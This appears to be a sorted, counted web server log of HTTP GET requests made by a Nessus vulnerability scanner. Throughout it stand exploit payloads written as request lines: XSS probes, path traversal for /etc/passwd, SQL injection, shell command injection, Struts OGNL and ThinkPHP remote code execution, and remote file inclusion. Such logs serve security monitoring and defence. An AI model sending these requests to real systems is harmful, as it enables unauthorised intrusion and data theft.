1 GET /5n3yrimx.x?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /5n3yrimx.x?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /6/ HTTP/1.1
1 GET /600KFCj3.rem HTTP/1.1
1 GET /7/ HTTP/1.1
1 GET /8/ HTTP/1.1
1 GET /83.118.68.34.bc.googleusercontent.com.7z HTTP/1.1
1 GET /83.118.68.34.bc.googleusercontent.com.Z HTTP/1.1
1 GET /83.118.68.34.bc.googleusercontent.com.bz2 HTTP/1.1
1 GET /83.118.68.34.bc.googleusercontent.com.gz HTTP/1.1
1 GET /83.118.68.34.bc.googleusercontent.com.jar HTTP/1.1
1 GET /83.118.68.34.bc.googleusercontent.com.rar HTTP/1.1
1 GET /83.118.68.34.bc.googleusercontent.com.tar.bz2 HTTP/1.1
1 GET /83.118.68.34.bc.googleusercontent.com.tar.gz HTTP/1.1
1 GET /83.118.68.34.bc.googleusercontent.com.tar HTTP/1.1
1 GET /83.118.68.34.bc.googleusercontent.com.tgz HTTP/1.1
1 GET /83.118.68.34.bc.googleusercontent.com.war HTTP/1.1
1 GET /83.118.68.34.bc.googleusercontent.com.z HTTP/1.1
1 GET /83.118.68.34.bc.googleusercontent.com.zip HTTP/1.1
1 GET /83.118.68.34.googleusercontent.7z HTTP/1.1
1 GET /83.118.68.34.googleusercontent.Z HTTP/1.1
1 GET /83.118.68.34.googleusercontent.bz2 HTTP/1.1
1 GET /83.118.68.34.googleusercontent.gz HTTP/1.1
1 GET /83.118.68.34.googleusercontent.jar HTTP/1.1
1 GET /83.118.68.34.googleusercontent.rar HTTP/1.1
1 GET /83.118.68.34.googleusercontent.tar.bz2 HTTP/1.1
1 GET /83.118.68.34.googleusercontent.tar.gz HTTP/1.1
1 GET /83.118.68.34.googleusercontent.tar HTTP/1.1
1 GET /83.118.68.34.googleusercontent.tgz HTTP/1.1
1 GET /83.118.68.34.googleusercontent.war HTTP/1.1
1 GET /83.118.68.34.googleusercontent.z HTTP/1.1
1 GET /83.118.68.34.googleusercontent.zip HTTP/1.1
1 GET /9/ HTTP/1.1
1 GET /99articles/ HTTP/1.1
1 GET /99articles/index.php?page=/etc/passwd%00 HTTP/1.1
1 GET /9QWM0KVw.ashx HTTP/1.1
1 GET /<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.asp HTTP/1.1
1 GET /<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.aspx HTTP/1.1
1 GET /<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.cfc HTTP/1.1
1 GET /<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.cfm HTTP/1.1
1 GET /<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.cgi HTTP/1.1
1 GET /<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.dll HTTP/1.1
1 GET /<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.do HTTP/1.1
1 GET /<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.exe HTTP/1.1
1 GET /<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.fts HTTP/1.1
1 GET /<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.htm HTTP/1.1
1 GET /<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.html HTTP/1.1
1 GET /<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.idc HTTP/1.1
1 GET /<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.jsp HTTP/1.1
1 GET /<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.jspa HTTP/1.1
1 GET /<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.kspx HTTP/1.1
1 GET /<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.mscgi HTTP/1.1
1 GET /<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.nsf HTTP/1.1
1 GET /<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.php3 HTTP/1.1
1 GET /<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.php HTTP/1.1
1 GET /<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.pl HTTP/1.1
1 GET /<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.x HTTP/1.1
1 GET /<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\"> HTTP/1.1
1 GET /<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /<script>cross_site_scripting.nasl</script>.asp HTTP/1.1
1 GET /<script>cross_site_scripting.nasl</script>.aspx HTTP/1.1
1 GET /<script>cross_site_scripting.nasl</script>.cfc HTTP/1.1
1 GET /<script>cross_site_scripting.nasl</script>.cfm HTTP/1.1
1 GET /<script>cross_site_scripting.nasl</script>.cgi HTTP/1.1
1 GET /<script>cross_site_scripting.nasl</script>.dll HTTP/1.1
1 GET /<script>cross_site_scripting.nasl</script>.do HTTP/1.1
1 GET /<script>cross_site_scripting.nasl</script>.exe HTTP/1.1
1 GET /<script>cross_site_scripting.nasl</script>.fts HTTP/1.1
1 GET /<script>cross_site_scripting.nasl</script>.htm HTTP/1.1
1 GET /<script>cross_site_scripting.nasl</script>.html HTTP/1.1
1 GET /<script>cross_site_scripting.nasl</script>.idc HTTP/1.1
1 GET /<script>cross_site_scripting.nasl</script>.jsp HTTP/1.1
1 GET /<script>cross_site_scripting.nasl</script>.jspa HTTP/1.1
1 GET /<script>cross_site_scripting.nasl</script>.kspx HTTP/1.1
1 GET /<script>cross_site_scripting.nasl</script>.mscgi HTTP/1.1
1 GET /<script>cross_site_scripting.nasl</script>.nsf HTTP/1.1
1 GET /<script>cross_site_scripting.nasl</script>.php3 HTTP/1.1
1 GET /<script>cross_site_scripting.nasl</script>.php HTTP/1.1
1 GET /<script>cross_site_scripting.nasl</script>.pl HTTP/1.1
1 GET /<script>cross_site_scripting.nasl</script>.x HTTP/1.1
1 GET /<script>cross_site_scripting.nasl</script> HTTP/1.1
1 GET /<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /<script>foo</script> HTTP/1.1
1 GET /?<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\"> HTTP/1.1
1 GET /?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /?<script>cross_site_scripting.nasl</script> HTTP/1.1
1 GET /?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
2 GET /?Mode=debug HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?\"><script>alert('struts_sa_surl_xss.nasl-1717627916')</script> HTTP/1.1
1 GET /? HTTP/1.1
1 GET /?action:%25{(new+java[.]lang[.]ProcessBuilder(new+java[.]lang[.]String[]{'id'})).start()} HTTP/1.1
1 GET /?class.classLoader.URLs[0]=struts_2_3_16_1_classloader_manipulation-1717627928 HTTP/1.1
1 GET /?class.module.classLoader.DefaultAssertionStatus=anything HTTP/1.1
1 GET /?cmd=Config HTTP/1.1
1 GET /?ho+{COMPLETE_VERSION} HTTP/1.1
1 GET /?mod=read&id=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /?p=subscribe HTTP/1.1
1 GET /?redirect:$%7b%23context%5b%27xwork.MethodAccessor.denyMethodExecution%27%5d%3dfalse%2c%23f%3d%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2c%23f.setAccessible%28true%29%2c%23f.set%28%23_memberAccess%2ctrue%29%2c@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27ping%20-c%203%20-p7947726d5075626a3470%20172.16.4.12%27%29.getInputStream%28%29%29%7d HTTP/1.1\n
1 GET /?redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23webroot%3d%23req.getSession().getServletContext().getRealPath('/'),%23resp%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23resp.print('At%201717627905%20Nessus%20found%20the%20path%20is%20'),%23resp.println(%23webroot),%23resp.flush(),%23resp.close()} HTTP/1.1
1 GET /?redirect:%24%7B57550614%2b16044095%7D HTTP/1.1
1 GET /?s=admin/%5cthink%5capp/invokefunction&function=call_user_func_array&vars[0]=file_get_contents&vars[1][]=index.phpadmin/%5cthink%5capp/invokefunction&function=call_user_func_array&vars[0]=file_get_contents&vars[1][]=index.php HTTP/1.1
1 GET /?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_get_contents&vars[1][]=index.phpindex/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_get_contents&vars[1][]=index.php HTTP/1.1
1 GET /?s=index/%5cthink%5cRequest/input&filter=file_get_contents&data=index.phpindex/%5cthink%5cRequest/input&filter=file_get_contents&data=index.php HTTP/1.1
1 GET /?showimage=%27%29%20UNION%20SELECT%20%27pixelpost_15rc1.nasl-1717627937.jpg%27%20as%20id%2c%201701462255%20as%20headline%2c%20683862499%20as%20datetime%2c%201576280472%20as%20body%2c%201307269278%20as%20category%2c%20990887406%20as%20image-- HTTP/1.1
1 GET /?tag=tenable-787514239&method%3a%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23writer%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23writer.println(%23parameters.tag[0]),%23writer.flush(),%23writer.close HTTP/1.1
1 GET /?tenable.test=anything HTTP/1.1
1 GET /?title=Special:Recentchanges&feed=atom HTTP/1.1
1 GET /?user=jffnms_user_sql_injection.nasl%27%20UNION%20SELECT%202%2c%27admin%27%2c%27%241%24RxS1ROtX%24IzA1S3fcCfyVfA9rwKBMi.%27%2c%27Administrator%27--&file=index&pass= HTTP/1.1
1 GET /About/frmAbout.aspx HTTP/1.1
1 GET /AccessNow/ericom.min.js HTTP/1.1
1 GET /Admin.php HTTP/1.1
1 GET /Admin/ HTTP/1.1
1 GET /AdminHTML/parse_xml.cgi?action=login&filename=frameset.html|id%00| HTTP/1.1
1 GET /AdminTools/querybuilder/nn.jsp HTTP/1.1
1 GET /AdminWeb/ HTTP/1.1
1 GET /Admin_files/ HTTP/1.1
1 GET /Administration/ HTTP/1.1
1 GET /AdvWebAdmin/ HTTP/1.1
1 GET /Agent/ HTTP/1.1
1 GET /Agents/ HTTP/1.1
1 GET /AirWatch/about HTTP/1.1
1 GET /Album/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0 HTTP/1.1
1 GET /Album/ HTTP/1.1
1 GET /AlbumArt_/ HTTP/1.1
1 GET /AwBase/about HTTP/1.1
1 GET /BizTalkServerDocs/ HTTP/1.1
1 GET /BizTalkServerRepository/ HTTP/1.1
1 GET /BizTalkTracking/ HTTP/1.1
1 GET /Boutiques/ HTTP/1.1
1 GET /BrowserWeb/portal/portalbanner.htm HTTP/1.1
1 GET /CFIDE/administrator/index.cfm HTTP/1.1
1 GET /CFIDE/administrator/settings/version.cfm HTTP/1.1
1 GET /CFIDE/probe.cfm HTTP/1.1
1 GET /CHANGELOG.md HTTP/1.1
1 GET /CS/ HTTP/1.1
1 GET /CSCOnm/servlet/AutoLogin.jsp?URL=http[:]//www[.]example[.]com/%0d%0aX-ciscoworks_response_splitting-nasl:%201717627961 HTTP/1.1
1 GET /CSCOnm/servlet/login/login.jsp?URL=CSCOnm/servlet/com.cisco.core.mice.main?command=</script><script>alert(document.cookie)</script> HTTP/1.1
3 GET /CSCOnm/servlet/login/login.jsp HTTP/1.1
2 GET /CVS/Entries HTTP/1.1
1 GET /CVS/ HTTP/1.1
1 GET /CategoryView.aspx?category=nessus HTTP/1.1
1 GET /ChangeLog HTTP/1.1
1 GET /ChatClient/ HTTP/1.1
1 GET /Citrix.Dwm.WorkloadBalance/Service HTTP/1.1
1 GET /Config/diff.php?file=%26id&new=1&old=2 HTTP/1.1
1 GET /ConsoleHelp/default.jsp HTTP/1.1
1 GET /ContentServer HTTP/1.1
1 GET /ControlManager/cgi-bin/dm_autologin_cgi.exe?-V HTTP/1.1
2 GET /ControlManager/default.htm HTTP/1.1
1 GET /ControllerWeb/ HTTP/1.1
1 GET /Corporate/ HTTP/1.1
1 GET /Count.cgi?align=topcenter HTTP/1.1
1 GET /CrystalReportWebFormViewer/crystalimagehandler.aspx?dynamicimage=../../../../../../../../winnt/system.ini HTTP/1.1
1 GET /CrystalReportWebFormViewer2/crystalimagehandler.aspx?dynamicimage=../../../../../../../../winnt/system.ini HTTP/1.1
1 GET /DB4Web/ HTTP/1.1
1 GET /DB4Web/mssp-us-1-us-east-1-autoscaled-ad0a714a-bd94-4e84-a53b-831391a04:23/foo HTTP/1.1
1 GET /DMR/ HTTP/1.1
1 GET /Default.aspx HTTP/1.1
1 GET /DesktopDirector HTTP/1.1
1 GET /DigitalScribe/ HTTP/1.1
1 GET /DigitalScribe/login.php HTTP/1.1
1 GET /Director HTTP/1.1
1 GET /DocuColor/ HTTP/1.1
1 GET /DomainFiles/*//../../../../../../etc/passwd HTTP/1.1
1 GET /EZPhotoSales/ HTTP/1.1
1 GET /EZPhotoSales/configuration/config.dat HTTP/1.1
1 GET /EZPhotoSales/configuration/galleryConfig.txt HTTP/1.1
1 GET /Edit.jsp?Page=Main HTTP/1.1
1 GET /Edit.jsp?page=User&editor=../../../Install HTTP/1.1
1 GET /Explorer/index.html HTTP/1.1
2 GET /FUSncoWjzimH HTTP/1.1
2 GET /GTcatalog/index.php?function=custom&custom=http[:]//example[.]com/1 HTTP/1.1
1 GET /GTcatalog/password.inc HTTP/1.1
1 GET /GWextranet/ HTTP/1.1
1 GET /GWextranet/scp.dll/sendto?template=../../../../../../../../../../../../boot.ini%00gwextranet_template_dir_traversal.nasl HTTP/1.1
1 GET /GXApp/ HTTP/1.1
1 GET /Gallery/ HTTP/1.1
1 GET /Gallery/configuration/config.dat HTTP/1.1
1 GET /Gallery/configuration/galleryConfig.txt HTTP/1.1
1 GET /HB/ HTTP/1.1
1 GET /HBTemplates/ HTTP/1.1
1 GET /HEAD HTTP/1.1
1 GET /HNAP1/ HTTP/1.1
1 GET /HTTP1.0/
2 GET /Home.do HTTP/1.1
1 GET /IBMWebAS/ HTTP/1.1
1 GET /IDMProv/jsps/help/Help.jsp HTTP/1.1
1 GET /IMS-AA-IDP/logonPrompt.do HTTP/1.1
2 GET /IlohaMail/ HTTP/1.1
1 GET /IlohaMail/index.php HTTP/1.1
1 GET /IlohaMail/source/index.php HTTP/1.1
1 GET /ImageVue/ HTTP/1.1
1 GET /InfoViewApp/logon.jsp HTTP/1.1
1 GET /InitialPage.asp HTTP/1.1
1 GET /Install/ HTTP/1.1
1 GET /JBookIt/ HTTP/1.1
1 GET /JSPWiki/Edit.jsp?Page=Main HTTP/1.1
1 GET /JSPWiki/Edit.jsp?page=User&editor=../../../Install HTTP/1.1
1 GET /JSPWiki/ HTTP/1.1
1 GET /Log/ HTTP/1.1
2 GET /Login.aspx HTTP/1.1
4 GET /LoginPage.do HTTP/1.1
1 GET /Loginhandler/Login HTTP/1.1
1 GET /MM/ HTTP/1.1
2 GET /MSWSMTP/Common/Authentication/Logon.aspx HTTP/1.1
1 GET /Mail/ HTTP/1.1
1 GET /MessagingManager/ HTTP/1.1
1 GET /Msword/ HTTP/1.1
2 GET /NASApp/nessus/ HTTP/1.1
1 GET /NCMContainer.cc HTTP/1.1
1 GET /NOCC/ HTTP/1.1
1 GET /NOCC/index.php HTTP/1.1
1 GET /NSearch/ HTTP/1.1
1 GET /NULL.ida HTTP/1.1
1 GET /Nessus404/index.php HTTP/1.1
1 GET /NetDynamic/ HTTP/1.1
1 GET /NetDynamics/ HTTP/1.1
1 GET /News/ HTTP/1.1
1 GET /NonExistant640355714/ HTTP/1.1
1 GET /NoviSurvey/Login.aspx HTTP/1.1
1 GET /NumberGuess/ HTTP/1.1
1 GET /OEMSettings.ini HTTP/1.1
1 GET /OnlineViewing/ HTTP/1.1
1 GET /OnlineViewing/configuration/config.dat HTTP/1.1
1 GET /OnlineViewing/configuration/galleryConfig.txt HTTP/1.1
1 GET /Orion/Login.asp HTTP/1.1
1 GET /Orion/Login.aspx HTTP/1.1
1 GET /OvCgi/OpenView5.exe HTTP/1.1
1 GET /OvCgi/ HTTP/1.1
1 GET /OvCgi/freeIPaddrs.ovpl?netnum=127.0.0.1&netmask=255.255.255.0&netid=127.0.0.1%20|%20id| HTTP/1.1
1 GET /OvCgi/ifaceMgr/setMon.ovpl?Action=continue&hostname=hp_openview_nnm_multiple_cmd_exec.nasl-1717627913|id HTTP/1.1
1 GET /OvCgi/ifaceMgr/setNotMon.ovpl?Action=continue&hostname=hp_openview_nnm_multiple_cmd_exec.nasl-1717627913|id HTTP/1.1
1 GET /OvCgi/ovlaunch.exe HTTP/1.1
1 GET /OvCgi/webappmon.exe?ins=nowait&act=natping&sel=%22255.255.255.255%20%26%20id%26%22 HTTP/1.1
1 GET /OvCgi/webappmon.exe?ins=nowait&sel=localhost&act=ping HTTP/1.1
1 GET /PDG_Cart/ HTTP/1.1
1 GET /PJreview_Neo.cgi?p=../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd HTTP/1.1
1 GET /PUBLIC/ADMIN/INDEX.HTM HTTP/1.1
2 GET /PassTrixMain.cc HTTP/1.1
1 GET /PhpDocumentor/ HTTP/1.1
1 GET /PhpDocumentor/docbuilder/top.php HTTP/1.1
1 GET /PhpGedView/login.php?url=editgedcoms.php HTTP/1.1
2 GET /Plone/ HTTP/1.1
1 GET /Portal/Portal.mwsl?MainSelection=USFW&TabSelection=NONE&ClientArea=/Portal/usfw-login.mwsl&DataFile=NONE&TemplateFile=NONE HTTP/1.1
1 GET /README.TXT HTTP/1.1
1 GET /README/ HTTP/1.1
1 GET /RELEASE-NOTES HTTP/1.1
1 GET /ROADS/ HTTP/1.1
1 GET /ROADS/cgi-bin/search.pl?form=../../../../../../etc/passwd%00 HTTP/1.1
1 GET /RSAarcher/Default.asp HTTP/1.1
1 GET /RSAarcher/Default.aspx HTTP/1.1
1 GET /Readme/ HTTP/1.1
1 GET /Remote/ HTTP/1.1
1 GET /Reporting/login/change_password.php?enable_auth=0 HTTP/1.1
1 GET /SAPHostControl/?wsdl HTTP/1.1
2 GET /SE/EMC_SE.swf HTTP/1.1
1 GET /SE/appInfo.xml HTTP/1.1
1 GET /SF2.5/docman/new.php HTTP/1.1
1 GET /SF2.5/patch/index.php HTTP/1.1
1 GET /SLwebmail/ShowLogin.dll?Language=fr HTTP/1.1
1 GET /SPT--ForumTopics.php?forumid=-9%20UNION%20SELECT%20null%2cnull%2cnull%2c1717627929%2c4%2c5 HTTP/1.1
1 GET /SProtectLinux/showpage.cgi?page=../html/splx_main.htm HTTP/1.1
1 GET /Sametime/buildinfo.txt HTTP/1.1
1 GET /Sametime/domino/html/sametime/buildinfoST75CF1.txt HTTP/1.1
1 GET /SchneiderUPS/ HTTP/1.1
1 GET /Security/login HTTP/1.1
1 GET /ServerView/SnmpView/SnmpListMibValues?SSL=&Server=34.68.118.83&ThisApplication=TestConnectivityFirst&ServerName=bcmes&Servername=127.0.0.1;id;,SType--Server&ParameterList=What--primary,,OtherCommunity--{{OtherCommunity}},,SecondIP--,,Timeout--5,,Community--public,,SType--,,ASPresent--1 HTTP/1.1
1 GET /SignIn.html HTTP/1.1
1 GET /SilverStream/Meta/Tables/?access-mode=text HTTP/1.1
1 GET /SilverStream/ HTTP/1.1
1 GET /SilverStream HTTP/1.1
1 GET /SiteScope/ HTTP/1.1
1 GET /SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&account=administrator HTTP/1.1
1 GET /SnoopServlet/ HTTP/1.1
1 GET /SpamConsole/ HTTP/1.1
1 GET /Stats/ HTTP/1.1
1 GET /StoreDB/ HTTP/1.1
1 GET /SugarCRM/ HTTP/1.1
1 GET /SugarCRM/index.php?action=Login&module=Users HTTP/1.1
1 GET /SystemInfo HTTP/1.1
1 GET /TXWebService/ HTTP/1.1
1 GET /Templates/ HTTP/1.1
1 GET /ToDo/ HTTP/1.1
1 GET /UDataArea?plugin=com.dell.oma.webplugins.AboutWebPlugin HTTP/1.1
1 GET /UI/Login?user=nessus-1717627781 HTTP/1.1
1 GET /UI/Login HTTP/1.1
1 GET /ViewerFrame?Mode=Motion HTTP/1.1
2 GET /VncViewer.jar HTTP/1.1
1 GET /WANem/about.html HTTP/1.1
1 GET /WEB-INF./web.xml HTTP/1.1
1 GET /WS2020/Default.aspx HTTP/1.1
1 GET /WS2021/Default.aspx HTTP/1.1
1 GET /WS2022/Default.aspx HTTP/1.1
1 GET /WS2023/Default.aspx HTTP/1.1
1 GET /WSsamples/ HTTP/1.1
1 GET /WebAdmin/main.dll/dispChangePass HTTP/1.1
1 GET /WebBank/ HTTP/1.1
1 GET /WebCalendar/ HTTP/1.1
1 GET /WebConsole/login/auth/ HTTP/1.1
1 GET /WebDB/ HTTP/1.1
1 GET /WebID/IISWebAgentIF.dll?postdata=\"><script>foo</script> HTTP/1.1
1 GET /WebInterface/ HTTP/1.1
1 GET /WebServiceImpl/axis2-web/ HTTP/1.1
1 GET /WebServiceImpl/axis2-web/axis2-web/index.jsp HTTP/1.1
1 GET /WebShop/ HTTP/1.1
1 GET /WebTrend/ HTTP/1.1
1 GET /Web_Store/web_store.cgi?page=../../../../../../etc/passwd%00.html HTTP/1.1
1 GET /Web_store/ HTTP/1.1
1 GET /Webcam/webcam.html HTTP/1.1
1 GET /Websense/cgi-bin/WsCgiLogin.exe?Page=login&UserName=nessus%22%3e%3cscript%3ealert%28%27websense_username_xss.nasl%27%29%3c%2fscript%3e HTTP/1.1
2 GET /WihPhoto/start.php HTTP/1.1
1 GET /Wiki/?title=Special:Recentchanges&feed=atom HTTP/1.1
1 GET /Wiki/RELEASE-NOTES HTTP/1.1
1 GET /Wiki/ HTTP/1.1
1 GET /Wiki/index.php HTTP/1.1
1 GET /Wiki/mw-config HTTP/1.1
1 GET /Wsusadmin/Errors/BrowserSettings.aspx HTTP/1.1
1 GET /XSL/ HTTP/1.1
2 GET /XeroxCentreWareWeb/ HTTP/1.1
1 GET /YaBB.pl?board=news&action=display&num=../../../../../../etc/passwd%00 HTTP/1.1
1 GET /YaBB.pl HTTP/1.1
1 GET /_ScriptLibrary/ HTTP/1.1
1 GET /_admin/ HTTP/1.1
1 GET /_backup/ HTTP/1.1
1 GET /_bsLib/ HTTP/1.1
1 GET /_bsLib/googlesearch/GoogleSearch.php?APP[path][lib]=/etc/passwd%00 HTTP/1.1
1 GET /_bslib/ HTTP/1.1
1 GET /_bslib/googlesearch/GoogleSearch.php?APP[path][lib]=/etc/passwd%00 HTTP/1.1
1 GET /_derived/ HTTP/1.1
1 GET /_errors/ HTTP/1.1
1 GET /_fpclass/ HTTP/1.1
1 GET /_head.php?_zb_path=../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /_mem_bin/ HTTP/1.1
7 GET /_mt/mt.cgi HTTP/1.1
1 GET /_notes/ HTTP/1.1
1 GET /_objects/ HTTP/1.1
1 GET /_old/ HTTP/1.1
1 GET /_pages/ HTTP/1.1
1 GET /_passwords/ HTTP/1.1
1 GET /_private/ HTTP/1.1
1 GET /_scripts/ HTTP/1.1
1 GET /_sharedtemplates/ HTTP/1.1
1 GET /_tests/ HTTP/1.1
1 GET /_themes/ HTTP/1.1
1 GET /_vti_bin/ HTTP/1.1
1 GET /_vti_bin/fpcount.exe HTTP/1.1
1 GET /_vti_bin/shtml.dll/_vti_rpc HTTP/1.1
1 GET /_vti_bot/ HTTP/1.1
1 GET /_vti_inf.html HTTP/1.1
1 GET /_vti_log/ HTTP/1.1
1 GET /_vti_pvt/ HTTP/1.1
1 GET /_vti_shm/ HTTP/1.1
1 GET /_vti_txt/ HTTP/1.1
1 GET /a/ HTTP/1.1
1 GET /a1disp3.cgi?/../../../../../../etc/passwd HTTP/1.1
1 GET /a1stats/a1disp3.cgi?/../../../../../../etc/passwd HTTP/1.1
1 GET /aaa9 HTTP/1.1
1 GET /aab8 HTTP/1.1
1 GET /aardvarktopsites/ HTTP/1.1
1 GET /aardvarktopsites/index.php HTTP/1.1
1 GET /about.jsp HTTP/1.1
1 GET /about.php HTTP/1.1
1 GET /about/ HTTP/1.1
2 GET /about HTTP/1.1
1 GET /aboutprinter.html HTTP/1.1
1 GET /acal/ HTTP/1.1
1 GET /acal/embed/day.php?path=/etc/passwd%00 HTTP/1.1
1 GET /acceso/ HTTP/1.1
1 GET /access/ HTTP/1.1
1 GET /accesswatch/ HTTP/1.1
1 GET /acciones/ HTTP/1.1
1 GET /account/?action=Login HTTP/1.1
1 GET /account/ HTTP/1.1
1 GET /account/login.php HTTP/1.1
1 GET /accounting/ HTTP/1.1
1 GET /accounting/control/checkLogin HTTP/1.1
1 GET /accounts/inc/include.php?language=0&lang_settings[0][1]=http[:]//example[.]com/nessus/ HTTP/1.1
1 GET /acegilogin.jsp HTTP/1.1
1 GET /acid/ HTTP/1.1
1 GET /acopia/ HTTP/1.1
1 GET /acp/index.php HTTP/1.1
1 GET /acp/lib/inserts.sql HTTP/1.1
1 GET /activatemember?activatecode=&member=%22%3e%3cscript%3ealert%28%27mvnforum_activatemember_xss.nasl%27%29%3c%2fscript%3e HTTP/1.1
1 GET /active.log HTTP/1.1
1 GET /activex/ HTTP/1.1
1 GET /actualanalyzer/ HTTP/1.1
1 GET /actualanalyzer/admin.php?style=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /actualanalyzer/direct.php?rf=/etc/passwd%00 HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /add.cgi HTTP/1.1
1 GET /add_url.htm?node=%3Cscript%3Ealert('XSS')%3C/script%3E HTTP/1.1
1 GET /add_user.php HTTP/1.1
1 GET /addentry.php HTTP/1.1
1 GET /addons/ HTTP/1.1
1 GET /addschup HTTP/1.1
1 GET /adlayer.php?layerstyle=../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /adm/ HTTP/1.1
1 GET /admbook/ HTTP/1.1
1 GET /admcgi/ HTTP/1.1
1 GET /admentor/ HTTP/1.1
1 GET /admin-bak/ HTTP/1.1
1 GET /admin-old/ HTTP/1.1
1 GET /admin.back/ HTTP/1.1
2 GET /admin.back HTTP/1.1
7 GET /admin.cgi HTTP/1.1
1 GET /admin.php?action=viewpro&member=admin<script>x</script> HTTP/1.1
1 GET /admin.php?dpt=conf&sub=general HTTP/1.1
1 GET /admin.php?loggedin=1 HTTP/1.1
1 GET /admin.php?style=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /admin.php?zfaction=config HTTP/1.1
5 GET /admin.php HTTP/1.1
1 GET /admin.pl?path=bin/mozilla&action=list_users HTTP/1.1
1 GET /admin/.git/HEAD HTTP/1.1
1 GET /admin/.git/info/refs?service=git-upload-pack HTTP/1.1
1 GET /admin/.svn/entries HTTP/1.1
1 GET /admin/4ghjig3F.htm HTTP/1.1
1 GET /admin/83.118.68.34.bc.googleusercontent.com.7z HTTP/1.1
1 GET /admin/83.118.68.34.bc.googleusercontent.com.Z HTTP/1.1
1 GET /admin/83.118.68.34.bc.googleusercontent.com.bz2 HTTP/1.1
1 GET /admin/83.118.68.34.bc.googleusercontent.com.gz HTTP/1.1
1 GET /admin/83.118.68.34.bc.googleusercontent.com.jar HTTP/1.1
1 GET /admin/83.118.68.34.bc.googleusercontent.com.rar HTTP/1.1
1 GET /admin/83.118.68.34.bc.googleusercontent.com.tar.bz2 HTTP/1.1
1 GET /admin/83.118.68.34.bc.googleusercontent.com.tar.gz HTTP/1.1
1 GET /admin/83.118.68.34.bc.googleusercontent.com.tar HTTP/1.1
1 GET /admin/83.118.68.34.bc.googleusercontent.com.tgz HTTP/1.1
1 GET /admin/83.118.68.34.bc.googleusercontent.com.war HTTP/1.1
1 GET /admin/83.118.68.34.bc.googleusercontent.com.z HTTP/1.1
1 GET /admin/83.118.68.34.bc.googleusercontent.com.zip HTTP/1.1
1 GET /admin/83.118.68.34.googleusercontent.7z HTTP/1.1
1 GET /admin/83.118.68.34.googleusercontent.Z HTTP/1.1
1 GET /admin/83.118.68.34.googleusercontent.bz2 HTTP/1.1
1 GET /admin/83.118.68.34.googleusercontent.gz HTTP/1.1
1 GET /admin/83.118.68.34.googleusercontent.jar HTTP/1.1
1 GET /admin/83.118.68.34.googleusercontent.rar HTTP/1.1
1 GET /admin/83.118.68.34.googleusercontent.tar.bz2 HTTP/1.1
1 GET /admin/83.118.68.34.googleusercontent.tar.gz HTTP/1.1
1 GET /admin/83.118.68.34.googleusercontent.tar HTTP/1.1
1 GET /admin/83.118.68.34.googleusercontent.tgz HTTP/1.1
1 GET /admin/83.118.68.34.googleusercontent.war HTTP/1.1
1 GET /admin/83.118.68.34.googleusercontent.z HTTP/1.1
1 GET /admin/83.118.68.34.googleusercontent.zip HTTP/1.1
1 GET /admin/CVS/Entries HTTP/1.1
1 GET /admin/HEAD HTTP/1.1
1 GET /admin/LocalIndex.html HTTP/1.1
1 GET /admin/SnoopServlet/ HTTP/1.1
1 GET /admin/_notes/dwsync.xml HTTP/1.1
1 GET /admin/_vti_inf.html HTTP/1.1
12 GET /admin/ HTTP/1.1
1 GET /admin/addentry.php?phpbb_root_path=/etc/passwd%00 HTTP/1.1
1 GET /admin/admin.php?sid=' HTTP/1.1
1 GET /admin/admin.php?sid=0' HTTP/1.1
3 GET /admin/admin.php HTTP/1.1
